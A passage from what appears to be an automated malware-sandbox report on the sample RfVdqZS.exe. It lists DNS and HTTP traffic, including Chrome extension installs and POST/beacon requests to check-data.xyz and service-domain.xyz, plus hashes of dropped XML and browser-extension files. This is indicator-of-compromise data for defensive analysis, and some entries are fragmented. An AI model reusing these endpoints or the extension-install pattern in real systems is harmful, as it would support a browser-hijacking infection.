  clients2.google.com IN CNAME clients.l.google.com
  clients.l.google.com IN A 142.250.187.238
• flag-gb
  GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&HbYhpkqLFX
  RfVdqZS.exe
  Remote address: 142.250.187.238:443
  Request
  GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&HbYhpkqLFX HTTP/1.1
  Host: clients2.google.com
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 302 Moved Temporarily
  Content-Security-Policy: script-src 'report-sample' 'nonce-nWCdI5BWl5wsB6dsY2rW0A' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
  Pragma: no-cache
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Date: Fri, 17 May 2024 00:14:20 GMT
  Location: https://clients2.googleusercontent.com/crx/blobs/AcO95ogHLJx8Cue3SQk2Qva6QXL97HnaoWLVQtuqGjk16HdJR3slygJ9a35qLWvrXYjtRILB2QsDwVag7EWtRmBIG88iqHGeLexvFXov2Qv7mHmxIY9hAMZSmuUiy0FSLm58L82TEea6NttLURUViQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
  Content-Type: text/html; charset=UTF-8
  X-Content-Type-Options: nosniff
  X-Frame-Options: SAMEORIGIN
  X-XSS-Protection: 1; mode=block
  Server: GSE
  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  Accept-Ranges: none
  Vary: Accept-Encoding
  Transfer-Encoding: chunked
• flag-us
  DNS clients2.googleusercontent.com
  RfVdqZS.exe
  Remote address: 8.8.8.8:53
  Request
  clients2.googleusercontent.com IN A
  Response
  clients2.googleusercontent.com IN CNAME googlehosted.l.googleusercontent.com
  googlehosted.l.googleusercontent.com IN A 172.217.16.225
• flag-gb
  GET https://clients2.googleusercontent.com/crx/blobs/AcO95ogHLJx8Cue3SQk2Qva6QXL97HnaoWLVQtuqGjk16HdJR3slygJ9a35qLWvrXYjtRILB2QsDwVag7EWtRmBIG88iqHGeLexvFXov2Qv7mHmxIY9hAMZSmuUiy0FSLm58L82TEea6NttLURUViQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
  RfVdqZS.exe
  Remote address: 172.217.16.225:443
  Request
  GET /crx/blobs/AcO95ogHLJx8Cue3SQk2Qva6QXL97HnaoWLVQtuqGjk16HdJR3slygJ9a35qLWvrXYjtRILB2QsDwVag7EWtRmBIG88iqHGeLexvFXov2Qv7mHmxIY9hAMZSmuUiy0FSLm58L82TEea6NttLURUViQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
  Connection: Keep-Alive
  Cache-Control: no-cache
  Host: clients2.googleusercontent.com
  Response
  HTTP/1.1 200 OK
  Accept-Ranges: bytes
  Content-Length: 26186
  X-GUploader-UploadID: ABPtcPodvGf8iQqO4kKm1Lfp9MKOXhsM2BTzYasMABO4u3APpZEDAuzFgoTJQtGapgkR6ywOKuA
  X-Goog-Hash: crc32c=i5zIOg==
  Server: UploadServer
  Date: Thu, 16 May 2024 00:29:51 GMT
  Expires: Fri, 16 May 2025 00:29:51 GMT
  Cache-Control: public, max-age=31536000
  Age: 85469
  Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
  ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
  Content-Type: application/x-chrome-extension
  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
• flag-gb
  GET https://clients2.googleusercontent.com/crx/blobs/AcO95ohaC-xb4JinR2L4xgBx_5P4NMMnlZXGRZ4GjqnBcE8u741f1pdJ31FM2ex9Dvux2mtSp7o2vOdNG-CbKy3AC_WD1qDBw50OF9sajxCUot_w99GEeDq9lDicrEa-3XEAxlKa5aVT124pqHTvFk349CQSNcXYbZDC/IBLKHHACNMPKHKDDGDJNNIJNABFEFGOE_1_0_0_0.crx
  RfVdqZS.exe
  Remote address: 172.217.16.225:443
  Request
  GET /crx/blobs/AcO95ohaC-xb4JinR2L4xgBx_5P4NMMnlZXGRZ4GjqnBcE8u741f1pdJ31FM2ex9Dvux2mtSp7o2vOdNG-CbKy3AC_WD1qDBw50OF9sajxCUot_w99GEeDq9lDicrEa-3XEAxlKa5aVT124pqHTvFk349CQSNcXYbZDC/IBLKHHACNMPKHKDDGDJNNIJNABFEFGOE_1_0_0_0.crx HTTP/1.1
  Connection: Keep-Alive
  Cache-Control: no-cache
  Host: clients2.googleusercontent.com
  Response
  HTTP/1.1 200 OK
  Accept-Ranges: bytes
  Content-Length: 194498
  X-GUploader-UploadID: ABPtcPrlFw62HAId0j_vcCtlP9_A7dzr7QXfLbvW2rzxxrDZibbREcPrzmhOAGOerwH5bj7xjss
  X-Goog-Hash: crc32c=mShFKQ==
  Server: UploadServer
  Date: Fri, 17 May 2024 00:11:12 GMT
  Expires: Sat, 17 May 2025 00:11:12 GMT
  Cache-Control: public, max-age=31536000
  Last-Modified: Wed, 10 Apr 2024 11:10:42 GMT
  ETag: b420c631_69a7cd6f_729649d6_7e259f5c_58c38719
  Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                      Age: 188
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                    • flag-gb
                                                                                                                                                                                                                      GET
                                                                                                                                                                                                                      https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Diblkhhacnmpkhkddgdjnnijnabfefgoe%26installsource%3Dondemand%26uc&vmYDASNdmd
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      142.250.187.238:443
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Diblkhhacnmpkhkddgdjnnijnabfefgoe%26installsource%3Dondemand%26uc&vmYDASNdmd HTTP/1.1
                                                                                                                                                                                                                      Host: clients2.google.com
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-qk3xlLmhD9ktxFsh1jizLQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                      Date: Fri, 17 May 2024 00:14:20 GMT
                                                                                                                                                                                                                      Location: https://clients2.googleusercontent.com/crx/blobs/AcO95ohaC-xb4JinR2L4xgBx_5P4NMMnlZXGRZ4GjqnBcE8u741f1pdJ31FM2ex9Dvux2mtSp7o2vOdNG-CbKy3AC_WD1qDBw50OF9sajxCUot_w99GEeDq9lDicrEa-3XEAxlKa5aVT124pqHTvFk349CQSNcXYbZDC/IBLKHHACNMPKHKDDGDJNNIJNABFEFGOE_1_0_0_0.crx
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                      Server: GSE
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      238.187.250.142.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      238.187.250.142.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      238.187.250.142.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      lhr25s34-in-f141e100net
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      225.16.217.172.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      225.16.217.172.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      225.16.217.172.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      lhr48s28-in-f11e100net
                                                                                                                                                                                                                      225.16.217.172.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      mad08s04-in-f1�H
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      api2.check-data.xyz
                                                                                                                                                                                                                      rundll32.exe
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      api2.check-data.xyz
                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      api2.check-data.xyz
                                                                                                                                                                                                                      IN CNAME
                                                                                                                                                                                                                      checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                                                                                                                      checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                      44.235.138.214
                                                                                                                                                                                                                      checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                      44.237.26.169
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      POST
                                                                                                                                                                                                                      http://api2.check-data.xyz/api2/google_api_ifi
                                                                                                                                                                                                                      rundll32.exe
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      44.235.138.214:80
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      POST /api2/google_api_ifi HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
                                                                                                                                                                                                                      Host: api2.check-data.xyz
                                                                                                                                                                                                                      Content-Length: 722
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Date: Fri, 17 May 2024 00:16:03 GMT
                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                      Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9824CDF98F06272B58281A369C0E7C7AE6EC5781D948882C8767BA08E2574E7340BD1AEA80ADD88F1586867317B7C62D227;PATH=/;MAX-AGE=43200
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      214.138.235.44.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      214.138.235.44.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      214.138.235.44.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      ec2-44-235-138-214 us-west-2compute amazonawscom
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      11.227.111.52.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 11.227.111.52.in-addr.arpa IN PTR
  Response:
• flag-us
  DNS 77.190.18.2.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 77.190.18.2.in-addr.arpa IN PTR
  Response: 77.190.18.2.in-addr.arpa IN PTR a2-18-190-77deploystaticakamaitechnologiescom
• flag-us
  DNS 14.173.189.20.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 14.173.189.20.in-addr.arpa IN PTR
  Response:
• flag-us
  DNS 14.173.189.20.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 14.173.189.20.in-addr.arpa IN PTR
• 54.210.117.250:443
  https://service-domain.xyz/google_ifi_ico.png?rnd=kp4ev2oMK8Bdn3my8MuG_DILC6QHLC4RGLC9PHLC6SHLC6QHLC7AILC5SHLC7RGLC7HKLC4
  tls, http  RfVdqZS.exe  982 B  4.5kB  11  9
  HTTP Request: GET https://service-domain.xyz/google_ifi_ico.png?rnd=kp4ev2oMK8Bdn3my8MuG_DILC6QHLC4RGLC9PHLC6SHLC6QHLC7AILC5SHLC7RGLC7HKLC4
  HTTP Response: 200
• 142.250.187.238:443
  https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&HbYhpkqLFX
  tls, http  RfVdqZS.exe  1.3kB  9.0kB  15  12
  HTTP Request: GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&HbYhpkqLFX
  HTTP Response: 302
• 172.217.16.225:443
  https://clients2.googleusercontent.com/crx/blobs/AcO95ohaC-xb4JinR2L4xgBx_5P4NMMnlZXGRZ4GjqnBcE8u741f1pdJ31FM2ex9Dvux2mtSp7o2vOdNG-CbKy3AC_WD1qDBw50OF9sajxCUot_w99GEeDq9lDicrEa-3XEAxlKa5aVT124pqHTvFk349CQSNcXYbZDC/IBLKHHACNMPKHKDDGDJNNIJNABFEFGOE_1_0_0_0.crx
  tls, http  RfVdqZS.exe  9.4kB  243.2kB  183  178
  HTTP Request: GET https://clients2.googleusercontent.com/crx/blobs/AcO95ogHLJx8Cue3SQk2Qva6QXL97HnaoWLVQtuqGjk16HdJR3slygJ9a35qLWvrXYjtRILB2QsDwVag7EWtRmBIG88iqHGeLexvFXov2Qv7mHmxIY9hAMZSmuUiy0FSLm58L82TEea6NttLURUViQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
  HTTP Response: 200
  HTTP Request: GET https://clients2.googleusercontent.com/crx/blobs/AcO95ohaC-xb4JinR2L4xgBx_5P4NMMnlZXGRZ4GjqnBcE8u741f1pdJ31FM2ex9Dvux2mtSp7o2vOdNG-CbKy3AC_WD1qDBw50OF9sajxCUot_w99GEeDq9lDicrEa-3XEAxlKa5aVT124pqHTvFk349CQSNcXYbZDC/IBLKHHACNMPKHKDDGDJNNIJNABFEFGOE_1_0_0_0.crx
  HTTP Response: 200
• 142.250.187.238:443
  https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Diblkhhacnmpkhkddgdjnnijnabfefgoe%26installsource%3Dondemand%26uc&vmYDASNdmd
  tls, http  RfVdqZS.exe  1.3kB  1.9kB  10  7
  HTTP Request: GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Diblkhhacnmpkhkddgdjnnijnabfefgoe%26installsource%3Dondemand%26uc&vmYDASNdmd
  HTTP Response: 302
• 44.235.138.214:80
  http://api2.check-data.xyz/api2/google_api_ifi
  http  rundll32.exe  1.2kB  536 B  5  3
  HTTP Request: POST http://api2.check-data.xyz/api2/google_api_ifi
  HTTP Response: 200
• 52.111.227.14:443
  322 B  7
• 8.8.8.8:53
  service-domain.xyz
  dns  RfVdqZS.exe  64 B  80 B  1  1
  DNS Request: service-domain.xyz
  DNS Response: 54.210.117.250
• 8.8.8.8:53
  250.117.210.54.in-addr.arpa
  dns  73 B  129 B  1  1
  DNS Request: 250.117.210.54.in-addr.arpa
• 8.8.8.8:53
  172.210.232.199.in-addr.arpa
  dns  74 B  128 B  1  1
  DNS Request: 172.210.232.199.in-addr.arpa
• 8.8.8.8:53
  11.97.55.23.in-addr.arpa
  dns  70 B  133 B  1  1
  DNS Request: 11.97.55.23.in-addr.arpa
• 8.8.8.8:53
  73.190.18.2.in-addr.arpa
  dns  70 B  133 B  1  1
  DNS Request: 73.190.18.2.in-addr.arpa
• 8.8.8.8:53
                                                                                                                                                                                                                      202.187.250.142.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      74 B
                                                                                                                                                                                                                      113 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      202.187.250.142.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      67.169.217.172.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      73 B
                                                                                                                                                                                                                      111 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      67.169.217.172.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      clients2.google.com
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      65 B
                                                                                                                                                                                                                      105 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      clients2.google.com

                                                                                                                                                                                                                      DNS Response

                                                                                                                                                                                                                      142.250.187.238

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      clients2.googleusercontent.com
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      76 B
                                                                                                                                                                                                                      121 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      clients2.googleusercontent.com

                                                                                                                                                                                                                      DNS Response

                                                                                                                                                                                                                      172.217.16.225

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      238.187.250.142.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      74 B
                                                                                                                                                                                                                      113 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      238.187.250.142.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      225.16.217.172.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      73 B
                                                                                                                                                                                                                      140 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      225.16.217.172.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      api2.check-data.xyz
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      rundll32.exe
                                                                                                                                                                                                                      65 B
                                                                                                                                                                                                                      159 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      api2.check-data.xyz

                                                                                                                                                                                                                      DNS Response

                                                                                                                                                                                                                      44.235.138.214
                                                                                                                                                                                                                      44.237.26.169

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      214.138.235.44.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      73 B
                                                                                                                                                                                                                      137 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      214.138.235.44.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      11.227.111.52.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      72 B
                                                                                                                                                                                                                      158 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      11.227.111.52.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      77.190.18.2.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      70 B
                                                                                                                                                                                                                      133 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      77.190.18.2.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      14.173.189.20.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      144 B
                                                                                                                                                                                                                      158 B
                                                                                                                                                                                                                      2
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      14.173.189.20.in-addr.arpa

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      14.173.189.20.in-addr.arpa

                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15


                                                                                                                                                                                                                    Downloads

• C:\$RECYCLE.BIN\S-1-5-18\desktop.ini
    Filesize  129B
    MD5       a526b9e7c716b3489d8cc062fbce4005
    SHA1      2df502a944ff721241be20a9e449d2acd07e0312
    SHA256    e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
    SHA512    d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

• C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\NXbwydK.xml
    Filesize  2KB
    MD5       c4fcedf800b0bb7fd5e5311f6cfaa93c
    SHA1      4c6f6a0398e6dfc1cd3105cf0dd9c26a660d7970
    SHA256    c2287ab70cdf617a88e6ab769350d421ae45ec72c92d15ad9ed53a45823bbdf4
    SHA512    d075339d632475ad86164c78a05db8f6dab1084ba5ef6d4c1e5c3a9ecff513b01e92f4442096b8d2fbe0f87278b162428bfac6949e19d4ec633192b8c9b6af9d

• C:\Program Files (x86)\REeMUtPoCvFU2\NpeMHAw.xml
    Filesize  2KB
    MD5       1e505cf28dc5dc87521f36b7c8236f96

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      f4ab4bc72bfdc7b23ac226501bb9cf4617f262f8

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      865bcb1a711823c34be99680387320fa1ac325e05a3e2891cff147971afd26c4

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      29ffa98cca1a55c6d23a361a513a9144cddb0f9af49596e3ca0b6c1dc0bc67fc3139e5b18afff5c5355a174e10e94056379e157fea6024e473819bd7ecb48be0

                                                                                                                                                                                                                    • C:\Program Files (x86)\kLpsRMujXEpbC\XnyNHtr.xml

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      165308698abce418ad3bb1c7ae4b900f

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      4ed02a7676636f1c2eca9219772e3ed424d26738

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      23735b888c93095b7629697fd08ae6bae2a31a59bbdac6438d292bfc4923f331

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      885f93b006ffad6b4077b65c6702de5ca3a9559da24dc2cf16687d01bb0d4c0198a2992b1c7599df62e0dc77397ecf52742537df5b4eeeb48a497ec1f91c071d

                                                                                                                                                                                                                    • C:\Program Files (x86)\tffvHWJZU\acexVhh.xml

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      6aaf496e2f7ad783454470c59b0ed8f6

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      7b146eecfd19a22cab9b18dd3a13c28cb35d318e

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      ea4248dd30b73db6f1f424b139de8389c7a76b43e0fcff4540b5b131605aa9c8

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      9cc01c3baaa049e9e6a25c01830b104ad3b04c4e51e7fd6e848cb8c302de14a21b46916838c1c02bd754a3bb4ceed9cbfae6e5ebd078d3abfa67023327774ed8

                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.5MB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      894f2b0db71de277d5bb85f0506d77cc

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      6c3b2513146e61e78350a43ae3f3f90192a7f6be

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      a83147e379aded12d109098fd0406dd3b11363e402fad9ed172183ccf83d7082

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      7b7fc1c480d468d8159a269e0ec61cace4ed32af5a373d81d99ab97b0cc0d3c50b731160dba3e1500934b7cc451d3a41df7c7a6681b8d5f9279e58d847e00d58

                                                                                                                                                                                                                    • C:\ProgramData\NGysLhxJEZNwhMVB\wPXELrG.xml

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      1b62a70699fcd547d8e1e306691477fa

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      28b6c1de23742ce48ccd9d899596bca87f4b2d54

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      ca923cc828534f833605f26758a7254c42a2749387c929036df35e935a038ced

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      68e4595a29b365f161e7a505aed800d891d610ba0c881ac45eed1ad6d94256d17fd500fd23634c5469d50d0af697e3efb65028d3d181ac10a8f93b81a78bc38c

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      187B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      136B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      150B

                                                                                                                                                                                                                      MD5

